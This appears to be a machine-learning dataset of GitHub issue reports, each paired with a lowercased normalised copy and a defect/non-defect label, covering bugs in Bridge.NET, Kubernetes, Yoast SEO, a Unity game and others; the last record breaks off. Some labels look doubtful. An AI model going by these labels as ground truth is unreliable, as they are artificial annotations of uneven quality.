external classes marked with and when a class marked with and attributes there should not be any adjustments to the class name this is a particular case of the issue basically it was supposed that even if a custom namespace specified the original class name will be used without arity value steps to reproduce c public class program public static void main var test new generic comment it to fix public class generic expected result js bridge assembly demo function asm globals use strict bridge define demo program main function main var test new generic actual result js bridge assembly demo function asm globals use strict bridge define demo program main function main var test new generic see also naming of external classes marked with
| 1
|
774,130
| 27,184,358,426
|
IssuesEvent
|
2023-02-19 02:12:35
|
Reyder95/Project-Vultura-3D-Unity
|
https://api.github.com/repos/Reyder95/Project-Vultura-3D-Unity
|
closed
|
Refreshing list causes flicker and mouse events to stop working if held
|
bug high priority in development
|
For the 2nd part, I may look into finding a way to have event happen on mouse down, rather than on mouse up.
For flicker, that may be a deeper, unfixable problem.
|
1.0
|
Refreshing list causes flicker and mouse events to stop working if held - For the 2nd part, I may look into finding a way to have event happen on mouse down, rather than on mouse up.
For flicker, that may be a deeper, unfixable problem.
|
non_defect
|
refreshing list causes flicker and mouse events to stop working if held for the part i may look into finding a way to have event happen on mouse down rather than on mouse up for flicker that may be a deeper unfixable problem
| 0
|
458,408
| 13,174,835,146
|
IssuesEvent
|
2020-08-11 23:38:36
|
phetsims/ratio-and-proportion
|
https://api.github.com/repos/phetsims/ratio-and-proportion
|
closed
|
Make white hand circle transparent
|
priority:2-high
|
We would like the white circle in the hand to be transparent. Right now, we are placing a white circle on top of the hand icon.
Current look:

`ai` file: https://github.com/phetsims/ratio-and-proportion/blob/13d8ee98ae71bc575bc47766f40cb58924a0f358/assets/filled-in-hand.ai
current png: https://github.com/phetsims/ratio-and-proportion/blob/13d8ee98ae71bc575bc47766f40cb58924a0f358/images/filled-in-hand.png
Here is the actual rasterized Node from the sim with the white circle on it:

In the code the white circle has a radius of 10 pixels, and its positioning on top of the current png icon looks like:
```js
// empirical multipliers to center hand on palm. Don't change these without altering the layout for the cue arrows too.
handImage.right = handImage.width * .4;
handImage.bottom = handImage.height * .475;
```
And the hand png is scaled down by `.4`.
@arouinfar, would it be easy to provide an `ai` and `png` with an added transparent circle replacing the white circle here?
I'm happy to talk more about this if you have any questions.
|
1.0
|
Make white hand circle transparent - We would like the white circle in the hand to be transparent. Right now, we are placing a white circle on top of the hand icon.
Current look:

`ai` file: https://github.com/phetsims/ratio-and-proportion/blob/13d8ee98ae71bc575bc47766f40cb58924a0f358/assets/filled-in-hand.ai
current png: https://github.com/phetsims/ratio-and-proportion/blob/13d8ee98ae71bc575bc47766f40cb58924a0f358/images/filled-in-hand.png
Here is the actual rasterized Node from the sim with the white circle on it:

In the code the white circle has a radius of 10 pixels, and its positioning on top of the current png icon looks like:
```js
// empirical multipliers to center hand on palm. Don't change these without altering the layout for the cue arrows too.
handImage.right = handImage.width * .4;
handImage.bottom = handImage.height * .475;
```
And the hand png is scaled down by `.4`.
@arouinfar, would it be easy to provide an `ai` and `png` with an added transparent circle replacing the white circle here?
I'm happy to talk more about this if you have any questions.
|
non_defect
|
make white hand circle transparent we would like the white circle in the hand to be transparent right now we are placing a white circle on top of the hand icon current look ai file current png here is the actual rasterized node from the sim with the white circle on it in the code the white circle has a radius of pixels and its positioning on top of the current png icon looks like js empirical multipliers to center hand on palm don t change these without altering the layout for the cue arrows too handimage right handimage width handimage bottom handimage height and the hand png is scaled down by arouinfar would it be easy to provide an ai and png with an added transparent circle replacing the white circle here i m happy to talk more about this if you have any questions
| 0
|
50,022
| 13,187,309,095
|
IssuesEvent
|
2020-08-13 03:00:18
|
icecube-trac/tix3
|
https://api.github.com/repos/icecube-trac/tix3
|
closed
|
mutineer. clean up. (Trac #16)
|
Migrated from Trac defect offline-software
|
<details>
<summary>_Migrated from https://code.icecube.wisc.edu/ticket/16
, reported by troy and owned by _</summary>
<p>
```json
{
"status": "closed",
"changetime": "2007-11-11T03:51:18",
"description": "\n",
"reporter": "troy",
"cc": "",
"resolution": "fixed",
"_ts": "1194753078000000",
"component": "offline-software",
"summary": "mutineer. clean up.",
"priority": "normal",
"keywords": "",
"time": "2007-06-03T16:33:37",
"milestone": "",
"owner": "",
"type": "defect"
}
```
</p>
</details>
|
1.0
|
mutineer. clean up. (Trac #16) -
<details>
<summary>_Migrated from https://code.icecube.wisc.edu/ticket/16
, reported by troy and owned by _</summary>
<p>
```json
{
"status": "closed",
"changetime": "2007-11-11T03:51:18",
"description": "\n",
"reporter": "troy",
"cc": "",
"resolution": "fixed",
"_ts": "1194753078000000",
"component": "offline-software",
"summary": "mutineer. clean up.",
"priority": "normal",
"keywords": "",
"time": "2007-06-03T16:33:37",
"milestone": "",
"owner": "",
"type": "defect"
}
```
</p>
</details>
|
defect
|
mutineer clean up trac migrated from reported by troy and owned by json status closed changetime description n reporter troy cc resolution fixed ts component offline software summary mutineer clean up priority normal keywords time milestone owner type defect
| 1
|
23,162
| 3,773,601,118
|
IssuesEvent
|
2016-03-17 03:28:00
|
cakephp/cakephp
|
https://api.github.com/repos/cakephp/cakephp
|
closed
|
Problems to write in Session after upgrade cakephp from 2.7.9 to 2.8.0
|
Defect On hold
|
Hello, I'm facing a problem to write stuff in Session. My project is set to save all session in database, through the lines below:
```
Configure::write('Session', [
'defaults' => 'database'
]);
```
It was ran sessions.php in Schema folder. I'm not using Customized classes for holding sessions.
I was using 2.7.9 version before upgrade it to 2.8.0.
The erros has being shown:
Warning (2): Unknown: Failed to write session data (user). Please verify that the current setting of session.save_path is correct (/tmp/) [Unknown, line 0]
I have had changed my configuration to cakephp hold the sessions.
Could you please help me?
Thank you in advance
|
1.0
|
Problems to write in Session after upgrade cakephp from 2.7.9 to 2.8.0 - Hello, I'm facing a problem to write stuff in Session. My project is set to save all session in database, through the lines below:
```
Configure::write('Session', [
'defaults' => 'database'
]);
```
It was ran sessions.php in Schema folder. I'm not using Customized classes for holding sessions.
I was using 2.7.9 version before upgrade it to 2.8.0.
The erros has being shown:
Warning (2): Unknown: Failed to write session data (user). Please verify that the current setting of session.save_path is correct (/tmp/) [Unknown, line 0]
I have had changed my configuration to cakephp hold the sessions.
Could you please help me?
Thank you in advance
|
defect
|
problems to write in session after upgrade cakephp from to hello i m facing a problem to write stuff in session my project is set to save all session in database through the lines below configure write session defaults database it was ran sessions php in schema folder i m not using customized classes for holding sessions i was using version before upgrade it to the erros has being shown warning unknown failed to write session data user please verify that the current setting of session save path is correct tmp i have had changed my configuration to cakephp hold the sessions could you please help me thank you in advance
| 1
|
282,378
| 8,706,037,423
|
IssuesEvent
|
2018-12-06 00:52:56
|
kubernetes/kubernetes
|
https://api.github.com/repos/kubernetes/kubernetes
|
closed
|
Incorrect start times can cause heapster to not have CPU stats
|
kind/bug priority/important-soon sig/node
|
/kind bug
/sig node
/priority important-soon
When HPA is supposed to upscale it is intermittently unable to calculate the number of desired replicas because of missing metrics
`$ kubectl describe hpa <hpa-name>`
` 3d 29s 80 horizontal-pod-autoscaler Warning FailedGetResourceMetric unable to get metrics for resource cpu: no metrics returned from heapster`
` 3d 29s 80 horizontal-pod-autoscaler Warning FailedComputeMetricsReplicas failed to get cpu utilization: unable to get metrics for resource cpu: no metrics returned from heapster`
The kubelet was returning an invalid Start time for pods, containers, and the node:
`"podRef": {`
` "uid": "7efbdb50-0830-11e8-9e01-42010af0001e"`
`},`
`"startTime": "2018-02-07T09:53:05Z",`
`"containers": [`
`{`
` "startTime": "2018-02-07T09:53:05Z",`
` "cpu": {`
` "time": "2018-02-07T09:53:03Z",`
` },`
` "memory": {`
` "time": "2018-02-07T09:53:03Z",`
` },`
` "rootfs": {`
`"time": "2018-02-07T09:53:03Z",`
`},`
`"logs": {`
` "time": "2018-02-07T09:53:03Z",`
`},`
`},`
Here is the Heapster code that computes cpu usage rate (this is the metric for HPA): https://github.com/kubernetes/heapster/blob/release-1.4/metrics/processors/rate_calculator.go, which requires that the current and previous batch have the same start time. A start time which changes often results in very few cpu metrics for heapster.
When cadvisor calculates the start time, it looks at the last time `cgroup.clone_children` was modified. https://github.com/google/cadvisor/blob/master/container/common/helpers.go#L56
This is an estimate, at best. We recently changed cAdvisor to use docker's container creation time: https://github.com/google/cadvisor/pull/1806.
But we still need to get a real Pod, Node and system container Start time.
|
1.0
|
Incorrect start times can cause heapster to not have CPU stats - /kind bug
/sig node
/priority important-soon
When HPA is supposed to upscale it is intermittently unable to calculate the number of desired replicas because of missing metrics
`$ kubectl describe hpa <hpa-name>`
` 3d 29s 80 horizontal-pod-autoscaler Warning FailedGetResourceMetric unable to get metrics for resource cpu: no metrics returned from heapster`
` 3d 29s 80 horizontal-pod-autoscaler Warning FailedComputeMetricsReplicas failed to get cpu utilization: unable to get metrics for resource cpu: no metrics returned from heapster`
The kubelet was returning an invalid Start time for pods, containers, and the node:
`"podRef": {`
` "uid": "7efbdb50-0830-11e8-9e01-42010af0001e"`
`},`
`"startTime": "2018-02-07T09:53:05Z",`
`"containers": [`
`{`
` "startTime": "2018-02-07T09:53:05Z",`
` "cpu": {`
` "time": "2018-02-07T09:53:03Z",`
` },`
` "memory": {`
` "time": "2018-02-07T09:53:03Z",`
` },`
` "rootfs": {`
`"time": "2018-02-07T09:53:03Z",`
`},`
`"logs": {`
` "time": "2018-02-07T09:53:03Z",`
`},`
`},`
Here is the Heapster code that computes cpu usage rate (this is the metric for HPA): https://github.com/kubernetes/heapster/blob/release-1.4/metrics/processors/rate_calculator.go, which requires that the current and previous batch have the same start time. A start time which changes often results in very few cpu metrics for heapster.
When cadvisor calculates the start time, it looks at the last time `cgroup.clone_children` was modified. https://github.com/google/cadvisor/blob/master/container/common/helpers.go#L56
This is an estimate, at best. We recently changed cAdvisor to use docker's container creation time: https://github.com/google/cadvisor/pull/1806.
But we still need to get a real Pod, Node and system container Start time.
|
non_defect
|
incorrect start times can cause heapster to not have cpu stats kind bug sig node priority important soon when hpa is supposed to upscale it is intermittently unable to calculate the number of desired replicas because of missing metrics kubectl describe hpa horizontal pod autoscaler warning failedgetresourcemetric unable to get metrics for resource cpu no metrics returned from heapster horizontal pod autoscaler warning failedcomputemetricsreplicas failed to get cpu utilization unable to get metrics for resource cpu no metrics returned from heapster the kubelet was returning an invalid start time for pods containers and the node podref uid starttime containers starttime cpu time memory time rootfs time logs time here is the heapster code that computes cpu usage rate this is the metric for hpa which requires that the current and previous batch have the same start time a start time which changes often results in very few cpu metrics for heapster when cadvisor calculates the start time it looks at the last time cgroup clone children was modified this is an estimate at best we recently changed cadvisor to use docker s container creation time but we still need to get a real pod node and system container start time
| 0
|
35,585
| 17,140,578,731
|
IssuesEvent
|
2021-07-13 09:09:46
|
Yoast/wordpress-seo
|
https://api.github.com/repos/Yoast/wordpress-seo
|
closed
|
fill_cache creates high server load
|
Yoast: Management component: indexables component: performance severity: minor
|
<!-- Please use this template when creating an issue.
- Please check the boxes after you've created your issue.
- Please use the latest version of Yoast SEO.-->
* [x] I've read and understood the [contribution guidelines](https://github.com/Yoast/wordpress-seo/blob/trunk/.github/CONTRIBUTING.md).
* [x] I've searched for any related issues and avoided creating a duplicate issue.
### Please give us a description of what happened.
After upgrade from Yoast SEO from 13.5 to 16.0.2 experiencing high server load.
### Please describe what you expected to happen and why.
The reason is very slow SQL query being executed on every ajax request:
```
SELECT SQL_CALC_FOUND_ROWS wp_posts.ID FROM wp_posts WHERE 1=1 AND wp_posts.post_type = 'post' AND (wp_posts.post_status = 'publish' OR wp_posts.post_status = 'future' OR wp_posts.post_status = 'draft' OR wp_posts.post_status = 'pending') ORDER BY wp_posts.post_date DESC LIMIT 0, 10
```
This query takes 0.5 sec on our server and EXPLAIN shows:
```
+------+-------------+----------+-------+------------------+------------------+---------+------+--------+------------------------------------------+
| id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |
+------+-------------+----------+-------+------------------+------------------+---------+------+--------+------------------------------------------+
| 1 | SIMPLE | wp_posts | range | type_status_date | type_status_date | 164 | NULL | 453574 | Using where; Using index; Using filesort |
+------+-------------+----------+-------+------------------+------------------+---------+------+--------+------------------------------------------+
```
It is being called from:
```
do_action('admin_init'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Admin\Admin_Columns_Cache_Integration->fill_cache, WP_Query->get_posts
```
Temporary workaround is to comment out fill_cache call in function register_hooks() in wp-content/plugins/wordpress-seo/src/integrations/admin/admin-columns-cache-integration.php:
```
// \add_action( 'admin_init', [ $this, 'fill_cache' ] );
```
but actually this line should be checked:
```
$posts = empty( $wp_query->posts ) ? $wp_query->get_posts() : $wp_query->posts;
```
#### Used versions
* WordPress version: 5.7
* Yoast SEO version: 16.0.2
|
True
|
fill_cache creates high server load - <!-- Please use this template when creating an issue.
- Please check the boxes after you've created your issue.
- Please use the latest version of Yoast SEO.-->
* [x] I've read and understood the [contribution guidelines](https://github.com/Yoast/wordpress-seo/blob/trunk/.github/CONTRIBUTING.md).
* [x] I've searched for any related issues and avoided creating a duplicate issue.
### Please give us a description of what happened.
After upgrade from Yoast SEO from 13.5 to 16.0.2 experiencing high server load.
### Please describe what you expected to happen and why.
The reason is very slow SQL query being executed on every ajax request:
```
SELECT SQL_CALC_FOUND_ROWS wp_posts.ID FROM wp_posts WHERE 1=1 AND wp_posts.post_type = 'post' AND (wp_posts.post_status = 'publish' OR wp_posts.post_status = 'future' OR wp_posts.post_status = 'draft' OR wp_posts.post_status = 'pending') ORDER BY wp_posts.post_date DESC LIMIT 0, 10
```
This query takes 0.5 sec on our server and EXPLAIN shows:
```
+------+-------------+----------+-------+------------------+------------------+---------+------+--------+------------------------------------------+
| id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |
+------+-------------+----------+-------+------------------+------------------+---------+------+--------+------------------------------------------+
| 1 | SIMPLE | wp_posts | range | type_status_date | type_status_date | 164 | NULL | 453574 | Using where; Using index; Using filesort |
+------+-------------+----------+-------+------------------+------------------+---------+------+--------+------------------------------------------+
```
It is being called from:
```
do_action('admin_init'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Admin\Admin_Columns_Cache_Integration->fill_cache, WP_Query->get_posts
```
Temporary workaround is to comment out fill_cache call in function register_hooks() in wp-content/plugins/wordpress-seo/src/integrations/admin/admin-columns-cache-integration.php:
```
// \add_action( 'admin_init', [ $this, 'fill_cache' ] );
```
but actually this line should be checked:
```
$posts = empty( $wp_query->posts ) ? $wp_query->get_posts() : $wp_query->posts;
```
#### Used versions
* WordPress version: 5.7
* Yoast SEO version: 16.0.2
|
non_defect
|
fill cache creates high server load please use this template when creating an issue please check the boxes after you ve created your issue please use the latest version of yoast seo i ve read and understood the i ve searched for any related issues and avoided creating a duplicate issue please give us a description of what happened after upgrade from yoast seo from to experiencing high server load please describe what you expected to happen and why the reason is very slow sql query being executed on every ajax request select sql calc found rows wp posts id from wp posts where and wp posts post type post and wp posts post status publish or wp posts post status future or wp posts post status draft or wp posts post status pending order by wp posts post date desc limit this query takes sec on our server and explain shows id select type table type possible keys key key len ref rows extra simple wp posts range type status date type status date null using where using index using filesort it is being called from do action admin init wp hook do action wp hook apply filters yoast wp seo integrations admin admin columns cache integration fill cache wp query get posts temporary workaround is to comment out fill cache call in function register hooks in wp content plugins wordpress seo src integrations admin admin columns cache integration php add action admin init but actually this line should be checked posts empty wp query posts wp query get posts wp query posts used versions wordpress version yoast seo version
| 0
|
25,519
| 4,365,411,789
|
IssuesEvent
|
2016-08-03 10:44:02
|
bridgedotnet/Bridge
|
https://api.github.com/repos/bridgedotnet/Bridge
|
opened
|
Decimal - No expected OverflowException
|
defect portage
|
### Expected
`System.OverflowException`
### Steps To Reproduce
```csharp
public class App
{
public static void ConversionsToDecimalWork()
{
int x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x + 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x - 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x + 79228162514264337593543950336.0);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x - 79228162514264337593543950336.0);
});
}
public static void ConversionsToDecimalWork()
{
int? x1 = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 + 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 - 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 + 79228162514264337593543950336.0);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 - 79228162514264337593543950336.0);
});
}
public static void DecimalToSByte()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToSByte(x - 129);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToSByte(x + 128);
});
}
public static void DecimalToByte()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToByte(x - 1);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToByte(x + 256);
});
}
public static void DecimalToShort()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt16(x - 32769);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt16(x + 32768);
});
}
public void DecimalToUShort()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt16(x - 1);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt16(x + 65536);
});
}
public void DecimalToInt()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt32(x - 2147483649);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt32(x + 2147483648);
});
}
public void DecimalToUInt()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt32(x - 1);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt32(x + 4294967296);
});
}
}
```
|
1.0
|
Decimal - No expected OverflowException - ### Expected
`System.OverflowException`
### Steps To Reproduce
```csharp
public class App
{
public static void ConversionsToDecimalWork()
{
int x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x + 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x - 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x + 79228162514264337593543950336.0);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal)(x - 79228162514264337593543950336.0);
});
}
public static void ConversionsToDecimalWork()
{
int? x1 = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 + 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 - 79228162514264337593543950336f);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 + 79228162514264337593543950336.0);
});
Assert.Throws<OverflowException>(() =>
{
var _ = (decimal?)(x1 - 79228162514264337593543950336.0);
});
}
public static void DecimalToSByte()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToSByte(x - 129);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToSByte(x + 128);
});
}
public static void DecimalToByte()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToByte(x - 1);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToByte(x + 256);
});
}
public static void DecimalToShort()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt16(x - 32769);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt16(x + 32768);
});
}
public void DecimalToUShort()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt16(x - 1);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt16(x + 65536);
});
}
public void DecimalToInt()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt32(x - 2147483649);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToInt32(x + 2147483648);
});
}
public void DecimalToUInt()
{
decimal x = 0;
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt32(x - 1);
});
Assert.Throws<OverflowException>(() =>
{
var _ = decimal.ToUInt32(x + 4294967296);
});
}
}
```
|
defect
|
decimal no expected overflowexception expected system overflowexception steps to reproduce csharp public class app public static void conversionstodecimalwork int x assert throws var decimal x assert throws var decimal x assert throws var decimal x assert throws var decimal x public static void conversionstodecimalwork int assert throws var decimal assert throws var decimal assert throws var decimal assert throws var decimal public static void decimaltosbyte decimal x assert throws var decimal tosbyte x assert throws var decimal tosbyte x public static void decimaltobyte decimal x assert throws var decimal tobyte x assert throws var decimal tobyte x public static void decimaltoshort decimal x assert throws var decimal x assert throws var decimal x public void decimaltoushort decimal x assert throws var decimal x assert throws var decimal x public void decimaltoint decimal x assert throws var decimal x assert throws var decimal x public void decimaltouint decimal x assert throws var decimal x assert throws var decimal x
| 1
|
65,964
| 19,830,864,337
|
IssuesEvent
|
2022-01-20 11:50:33
|
GoldenSoftwareLtd/gedemin
|
https://api.github.com/repos/GoldenSoftwareLtd/gedemin
|
closed
|
Загадочные РУИДы: РУИД генерируется, хотя не должен
|
Type-Defect Depot BigID
|
Замечено, что записям из INV_MOVEMENT могут соответствовать данные в GD_RUID!
И на клиентских базах, и на эталоне.
На эталоне я работаю под администратором, создаю\удаляю\редактирую разные документы. По некоторым движениям руиды есть, по другим - нет. От типа документа не зависит. По одной позиции одной шапки руид может быть, по другой - нет.
Вот есть даже пример. Обратите внимание на выделенную часть: 4 движения созданы по одной и той же позиции, по одной паре руиды есть, по другой - нет.

Поискала в скриптах и метаданных - не нашла, где может вставляться РУИД (где-то в ехе?).
Если мы перейдем на другой генератор, а руиды втихаря будут создаваться для мувментов и проводок, можем в итоге получить конфликт при записи в гд_руид.
Надо понять, где эти руиды вставляются, и зачем.
|
1.0
|
Загадочные РУИДы: РУИД генерируется, хотя не должен - Замечено, что записям из INV_MOVEMENT могут соответствовать данные в GD_RUID!
И на клиентских базах, и на эталоне.
На эталоне я работаю под администратором, создаю\удаляю\редактирую разные документы. По некоторым движениям руиды есть, по другим - нет. От типа документа не зависит. По одной позиции одной шапки руид может быть, по другой - нет.
Вот есть даже пример. Обратите внимание на выделенную часть: 4 движения созданы по одной и той же позиции, по одной паре руиды есть, по другой - нет.

Поискала в скриптах и метаданных - не нашла, где может вставляться РУИД (где-то в ехе?).
Если мы перейдем на другой генератор, а руиды втихаря будут создаваться для мувментов и проводок, можем в итоге получить конфликт при записи в гд_руид.
Надо понять, где эти руиды вставляются, и зачем.
|
defect
|
загадочные руиды руид генерируется хотя не должен замечено что записям из inv movement могут соответствовать данные в gd ruid и на клиентских базах и на эталоне на эталоне я работаю под администратором создаю удаляю редактирую разные документы по некоторым движениям руиды есть по другим нет от типа документа не зависит по одной позиции одной шапки руид может быть по другой нет вот есть даже пример обратите внимание на выделенную часть движения созданы по одной и той же позиции по одной паре руиды есть по другой нет поискала в скриптах и метаданных не нашла где может вставляться руид где то в ехе если мы перейдем на другой генератор а руиды втихаря будут создаваться для мувментов и проводок можем в итоге получить конфликт при записи в гд руид надо понять где эти руиды вставляются и зачем
| 1
|
627,701
| 19,912,386,957
|
IssuesEvent
|
2022-01-25 18:31:18
|
bcgov/entity
|
https://api.github.com/repos/bcgov/entity
|
closed
|
Account Switching Issue
|
bug Priority1 Assets
|
**Describe the bug in the current situation:**
When trying to switch from one account to another (Basic to Premium), it doesn't get switched
**Link bug to the User Story:**
**Impact of this bug:**
High
**Pre Conditions:**
**Steps to Reproduce:**
1. Log in to Test using BC Services Card (BCREG2014)
2. Navigate to My Business Registry
3. Click on the Account menu on the top.
4. Switch from "North Shore Credit Union" to "BITHEAD CONSULTING", sometimes the message displays as it got switched, but doesn't switch.
Current Behavior when Login to BCREG2014:

When My Business Registry tile is clicked:

|
1.0
|
Account Switching Issue - **Describe the bug in the current situation:**
When trying to switch from one account to another (Basic to Premium), it doesn't get switched
**Link bug to the User Story:**
**Impact of this bug:**
High
**Pre Conditions:**
**Steps to Reproduce:**
1. Log in to Test using BC Services Card (BCREG2014)
2. Navigate to My Business Registry
3. Click on the Account menu on the top.
4. Switch from "North Shore Credit Union" to "BITHEAD CONSULTING", sometimes the message displays as it got switched, but doesn't switch.
Current Behavior when Login to BCREG2014:

When My Business Registry tile is clicked:

|
non_defect
|
account switching issue describe the bug in the current situation when trying to switch from one account to another basic to premium it doesn t get switched link bug to the user story impact of this bug high pre conditions steps to reproduce log in to test using bc services card navigate to my business registry click on the account menu on the top switch from north shore credit union to bithead consulting sometimes the message displays as it got switched but doesn t switch current behavior when login to when my business registry tile is clicked
| 0
|
173,826
| 14,439,029,854
|
IssuesEvent
|
2020-12-07 13:52:19
|
geosolutions-it/austrocontrol-C125
|
https://api.github.com/repos/geosolutions-it/austrocontrol-C125
|
closed
|
Client ID 20 - Responsive Design - Info Box
|
Accepted C125-2020-AUSTROCONTROL-Map2Imp Documentation user feedback
|
- Not shown as i-sign in toolbar (specified in technical proposal)
- Not shown on mobile devices
- Right align for image doesn't work (It is correclty shown in editing mode, but not saved)
- Size of modal info box is not responsive, but has a fixed size. Therefore there may be a lot of whitespace.
|
1.0
|
Client ID 20 - Responsive Design - Info Box - - Not shown as i-sign in toolbar (specified in technical proposal)
- Not shown on mobile devices
- Right align for image doesn't work (It is correclty shown in editing mode, but not saved)
- Size of modal info box is not responsive, but has a fixed size. Therefore there may be a lot of whitespace.
|
non_defect
|
client id responsive design info box not shown as i sign in toolbar specified in technical proposal not shown on mobile devices right align for image doesn t work it is correclty shown in editing mode but not saved size of modal info box is not responsive but has a fixed size therefore there may be a lot of whitespace
| 0
|
7,794
| 2,610,636,953
|
IssuesEvent
|
2015-02-26 21:33:42
|
alistairreilly/open-ig
|
https://api.github.com/repos/alistairreilly/open-ig
|
closed
|
Csillagtérkép&bal klikk felfedezetlen részen
|
auto-migrated Milestone-0.93.500 Priority-Medium Type-Defect UI-Layout
|
```
Ahogy teszteltem a hangokat, kattogtattam felfedezetlen területeken, és ki
tudtam jelölni 1 bolygót. Ezt többször is meg tudtam csinálni, és ennek
nem szabadna megtörténnie, elvileg a felfedezetlen térkép ilyen
szempontból "statikus"-nak kellene lennie.
```
Original issue reported on code.google.com by `Jozsef.T...@gmail.com` on 25 Aug 2011 at 6:10
|
1.0
|
Csillagtérkép&bal klikk felfedezetlen részen - ```
Ahogy teszteltem a hangokat, kattogtattam felfedezetlen területeken, és ki
tudtam jelölni 1 bolygót. Ezt többször is meg tudtam csinálni, és ennek
nem szabadna megtörténnie, elvileg a felfedezetlen térkép ilyen
szempontból "statikus"-nak kellene lennie.
```
Original issue reported on code.google.com by `Jozsef.T...@gmail.com` on 25 Aug 2011 at 6:10
|
defect
|
csillagtérkép bal klikk felfedezetlen részen ahogy teszteltem a hangokat kattogtattam felfedezetlen területeken és ki tudtam jelölni bolygót ezt többször is meg tudtam csinálni és ennek nem szabadna megtörténnie elvileg a felfedezetlen térkép ilyen szempontból statikus nak kellene lennie original issue reported on code google com by jozsef t gmail com on aug at
| 1
|
50,904
| 13,187,963,597
|
IssuesEvent
|
2020-08-13 05:09:24
|
icecube-trac/tix3
|
https://api.github.com/repos/icecube-trac/tix3
|
closed
|
[filterscripts] make sure it builds without ROOT in the toolstack (Trac #1656)
|
Migrated from Trac cmake defect
|
Make sure filterscripts is OK without ROOT, just exclude the small bits that need it.
<details>
<summary><em>Migrated from <a href="https://code.icecube.wisc.edu/ticket/1656">https://code.icecube.wisc.edu/ticket/1656</a>, reported by blaufuss and owned by blaufuss</em></summary>
<p>
```json
{
"status": "closed",
"changetime": "2019-02-13T14:11:57",
"description": "Make sure filterscripts is OK without ROOT, just exclude the small bits that need it.\n\n",
"reporter": "blaufuss",
"cc": "",
"resolution": "fixed",
"_ts": "1550067117911749",
"component": "cmake",
"summary": "[filterscripts] make sure it builds without ROOT in the toolstack",
"priority": "normal",
"keywords": "",
"time": "2016-04-25T20:36:20",
"milestone": "",
"owner": "blaufuss",
"type": "defect"
}
```
</p>
</details>
|
1.0
|
[filterscripts] make sure it builds without ROOT in the toolstack (Trac #1656) - Make sure filterscripts is OK without ROOT, just exclude the small bits that need it.
<details>
<summary><em>Migrated from <a href="https://code.icecube.wisc.edu/ticket/1656">https://code.icecube.wisc.edu/ticket/1656</a>, reported by blaufuss and owned by blaufuss</em></summary>
<p>
```json
{
"status": "closed",
"changetime": "2019-02-13T14:11:57",
"description": "Make sure filterscripts is OK without ROOT, just exclude the small bits that need it.\n\n",
"reporter": "blaufuss",
"cc": "",
"resolution": "fixed",
"_ts": "1550067117911749",
"component": "cmake",
"summary": "[filterscripts] make sure it builds without ROOT in the toolstack",
"priority": "normal",
"keywords": "",
"time": "2016-04-25T20:36:20",
"milestone": "",
"owner": "blaufuss",
"type": "defect"
}
```
</p>
</details>
|
defect
|
make sure it builds without root in the toolstack trac make sure filterscripts is ok without root just exclude the small bits that need it migrated from json status closed changetime description make sure filterscripts is ok without root just exclude the small bits that need it n n reporter blaufuss cc resolution fixed ts component cmake summary make sure it builds without root in the toolstack priority normal keywords time milestone owner blaufuss type defect
| 1
|
370,281
| 10,927,647,316
|
IssuesEvent
|
2019-11-22 17:08:51
|
arfc/arfc.github.io
|
https://api.github.com/repos/arfc/arfc.github.io
|
closed
|
Make guide how to use Git Large File Storage
|
Comp:Input Difficulty:1-Beginner Priority:2-Normal Status:5-In Review Type:Feature
|
Create the manual on how to use Git Large File Storage
## I'm submitting a ...
- [ ] bug report
- [x] feature request
- [ ] question
## Expected Behavior
## Actual Behavior
## Steps to Reproduce the Problem
1.
1.
1.
## Specifications
- Version:
- Platform:
- Subsystem:
## How can this issue be closed?
This issue can be closed when manual will be added to the website.
|
1.0
|
